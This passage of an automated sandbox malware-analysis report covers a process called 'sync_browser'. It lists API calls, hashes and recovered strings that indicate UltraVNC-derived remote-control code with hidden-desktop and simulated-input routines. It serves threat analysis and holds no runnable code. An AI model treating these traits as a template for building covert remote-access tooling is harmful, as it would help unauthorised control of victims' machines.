                                                      • Part of subcall function 00007FF7D59F3480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59F3494
                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59E7B3F
                                                      • Part of subcall function 00007FF7D59F3370: realloc.LIBCMT ref: 00007FF7D59F339B
                                                      • Part of subcall function 00007FF7D59F3370: Sleep.KERNEL32(?,?,00000000,00007FF7D59E7B2F,?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59F33B7
                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59E7B4F
                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF7D59E7B9D,?,?,?,?,00007FF7D59E79F3), ref: 00007FF7D59E7B5C
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                    • String ID:
                                                    • API String ID: 1909145217-0
                                                    • Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                    • Instruction ID: eb2f4d71012a0cccb6f3fd90c8c0b4e06328900e4a67e19d53bf89ea7b8762df
                                                    • Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                    • Instruction Fuzzy Hash: C2217120B0E65242EA04BB22E95446DE665BF84FC4BC84437DD0D4775AEF7CE485C320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalDeleteSection$FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3328731263-0
                                                    • Opcode ID: 8efbe1f9ef3851a4ff4b1dc12ed94241d7363f7543c6192012ec118bd10c3970
                                                    • Instruction ID: 3e5c153d615e57d3762970578d0048bf4581b9ce81ac6605242aa8a559e44730
                                                    • Opcode Fuzzy Hash: 8efbe1f9ef3851a4ff4b1dc12ed94241d7363f7543c6192012ec118bd10c3970
                                                    • Instruction Fuzzy Hash: FB213D21719B81A7EA48EB24D5A06FCA364FF81B54FC40132DAAD032A1DF3CA1A5C321
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                    • String ID:
                                                    • API String ID: 1445889803-0
                                                    • Opcode ID: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                    • Instruction ID: 6e5b5d49f4b05e1f88b68d6e3857f1f79de6cac985d819f85a7cf0202ba1c6dd
                                                    • Opcode Fuzzy Hash: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                    • Instruction Fuzzy Hash: 3C01A122A28A1587F740AF25E844669EB60FF88F94FC46532EE5E077A4CF3CD8948310
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Event$CriticalInitializeSection
                                                    • String ID:
                                                    • API String ID: 4164307405-0
                                                    • Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                    • Instruction ID: 118d92c705d9d7e49218004396e2cfb9d042a02da08c51fe1e864d33e1e74e32
                                                    • Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                    • Instruction Fuzzy Hash: F6010272514B01C6D7049F39E9804ACB7B8FF98F98B904126CE8D57768CF39C4A5C360
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_errno
                                                    • String ID:
                                                    • API String ID: 921712934-0
                                                    • Opcode ID: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                    • Instruction ID: 417f03cd45b5913dfd67ad2e7a143cbc6f2b204b3c7732779aaadc3781d97e70
                                                    • Opcode Fuzzy Hash: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                    • Instruction Fuzzy Hash: DE014BA2E0E64647EA053B54885137CAA529FA1F6AFD64733DD2D06BD2CB7D65408330
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: gethostbynamesprintf
                                                    • String ID: %d.$IP address unavailable
                                                    • API String ID: 4032199589-2983120142
                                                    • Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                    • Instruction ID: 9a26384c3dde9a3b58c9eb731fed319f16ddc628051b4bf97e4c4404efd958ed
                                                    • Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                    • Instruction Fuzzy Hash: FA419121618A8582D620EB25A84056EFBA0FB84FE4FC45732EEAE43BD5DF3CD1518710
                                                    APIs
                                                    • LoadCursorA.USER32 ref: 00007FF7D5960925
                                                      • Part of subcall function 00007FF7D595D930: InitializeCriticalSection.KERNEL32 ref: 00007FF7D595D95E
                                                      • Part of subcall function 00007FF7D595D930: InitializeCriticalSection.KERNEL32 ref: 00007FF7D595D9EB
                                                      • Part of subcall function 00007FF7D595D930: LoadLibraryA.KERNEL32 ref: 00007FF7D595DA0D
                                                      • Part of subcall function 00007FF7D595D930: GetProcAddress.KERNEL32 ref: 00007FF7D595DA30
                                                      • Part of subcall function 00007FF7D595D930: LoadLibraryA.KERNEL32 ref: 00007FF7D595DA51
                                                      • Part of subcall function 00007FF7D595D930: GetProcAddress.KERNEL32 ref: 00007FF7D595DA6D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load$AddressCriticalInitializeLibraryProcSection$Cursormalloc
                                                    • String ID: vncDesktopSW.cpp : SWinit $vncdesktop.cpp : failed to start hook thread$vncdesktop.cpp : initialising desktop handler
                                                    • API String ID: 2513085289-3031267129
                                                    • Opcode ID: e487d388fed18aea2260250da6f24d23774b770b27bbd1d7d67b117f7b2f2a02
                                                    • Instruction ID: d551aa61ba1dc28884990a338c7d1ea296685cb4bd7232bd5e1545b22ae975ab
                                                    • Opcode Fuzzy Hash: e487d388fed18aea2260250da6f24d23774b770b27bbd1d7d67b117f7b2f2a02
                                                    • Instruction Fuzzy Hash: 11215931A18B9193F608AB60E5405ADE3A4FB84B90FC44636DAAD57795DF3CA065C360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DesktopInputOpen
                                                    • String ID: Default
                                                    • API String ID: 601053899-753088835
                                                    • Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                    • Instruction ID: ebec03262f71ea4947327a19df33c7610e03fc61667fd7fd3b189eb9354a5e42
                                                    • Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                    • Instruction Fuzzy Hash: 03219F35A1D6C283EA34AB21B4117AEA7A4FB89B88FC41032DE8D43788CF3DD014CB10
                                                    APIs
                                                    Strings
                                                    • HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x), xrefs: 00007FF7D593A89F
                                                    • HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x, xrefs: 00007FF7D593A8B0
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorInfoLastParametersSystem
                                                    • String ID: HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x
                                                    • API String ID: 2777246624-1049114938
                                                    • Opcode ID: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                    • Instruction ID: 357801257e6a2b592504b5711aa8267bdc8d1aaccdb27784d35e8fa54273472d
                                                    • Opcode Fuzzy Hash: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                    • Instruction Fuzzy Hash: DD213E31A08692C7E714AF51E40066DBBA0FB85B48FC44136DE8E57A58DF3CE546C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID: fake %d down$fake %d up
                                                    • API String ID: 4278518827-2496597273
                                                    • Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                    • Instruction ID: 63dfda61b59167dc2ad6a3923849d62bff66f7d49c2cf81cb04ec008178e276d
                                                    • Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                    • Instruction Fuzzy Hash: 9A018E21F1869187FB14A726A45057DAF92AF88F48FD88437E94E032A5CF3CD846C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
                                                    • String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
                                                    • API String ID: 542764273-2415377678
                                                    • Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                    • Instruction ID: f1937934f01ef9b0e05d7b53b515e6a014d31272b39293c6f009430bb9340452
                                                    • Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                    • Instruction Fuzzy Hash: 3A01E575A1816397F604BB64E800AADAF61AF94B49FC04037DC0E57565DE3CA20AC7B2
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProcessWindow$CurrentFindThread
                                                    • String ID: WinVNC Tray Icon
                                                    • API String ID: 1332243453-1071638575
                                                    • Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                    • Instruction ID: bbb38e034ca1ca3dc31c9afdef08fc38ec53efc64fc003b61b0e0050f9265b0e
                                                    • Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                    • Instruction Fuzzy Hash: 4EF01221A2864187DA946B65B44146DE654EFC8FC4BC42036EE5E46758DF3CD4858B10
                                                    APIs
                                                    • malloc.LIBCMT ref: 00007FF7D5952328
                                                      • Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
                                                      • Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
                                                      • Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
                                                      • Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
                                                      • Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8
                                                    • free.LIBCMT ref: 00007FF7D5952564
                                                    • free.LIBCMT ref: 00007FF7D5952617
                                                      • Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
                                                      • Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
                                                      • Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C
                                                    Strings
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7D595230B
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
